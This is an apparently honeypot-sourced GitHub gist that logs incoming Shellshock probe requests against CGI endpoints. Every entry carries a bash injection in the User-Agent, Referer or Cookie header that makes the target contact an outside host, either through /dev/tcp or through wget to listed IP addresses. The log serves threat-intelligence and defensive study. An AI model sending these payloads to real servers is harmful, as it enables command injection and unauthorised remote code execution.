Skip to content

Instantly share code, notes, and snippets.

@jatrost
Last active August 29, 2015 14:07
Show Gist options
  • Save jatrost/c0fc8524896ce5fd7a3f to your computer and use it in GitHub Desktop.
Save jatrost/c0fc8524896ce5fd7a3f to your computer and use it in GitHub Desktop.
Simple vulnerability tests that caused outbound traffic
source_ip: 192.99.247.174
url: http://XXX.XXX.XXX.XXX/cgi-bin/report.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "(echo 'GET /host/ad6a949e2c23b6fe51f0d3991b4a2375c2e7308a0e0f9f347c8c7947ebf7053d' > /dev/tcp/vulnerable.shellshocker.net/8000)" #Your system may be vulnerable to ShellShock. Please visit https://shellshocker.net/ for more information.
Content-Type: text/plain
source_ip: 37.48.65.71
url: http://XXX.XXX.XXX.XXX/test.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
Accept: */*
User-Agent: () { }; wget http://107.170.77.222/
Content-Type: text/plain
source_ip: 37.48.65.71
url: http://XXX.XXX.XXX.XXX/ahgfsjhg.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
Accept: */*
User-Agent: () { }; wget 107.170.77.222:2222
Content-Type: text/plain
source_ip: 37.48.65.71
url: http://XXX.XXX.XXX.XXX/welcomepage.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
Accept: */*
User-Agent: () { }; wget 107.170.77.222:2222
Content-Type: text/plain
source_ip: 37.48.65.71
url: http://XXX.XXX.XXX.XXX/welcomepage.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
Accept: */*
User-Agent: () { :; }; wget 107.170.77.222:2222
Referer: () { :; }; wget 107.170.77.222:2222
Content-Type: text/plain
Cookie: () { :; }; wget 107.170.77.222:2222
source_ip: 82.221.128.206
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Accept: */*
Content-Length:
User-Agent: () { :;}; /bin/bash -c "wget http://82.221.105.197/bash-count.txt"
Content-Type: text/plain
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment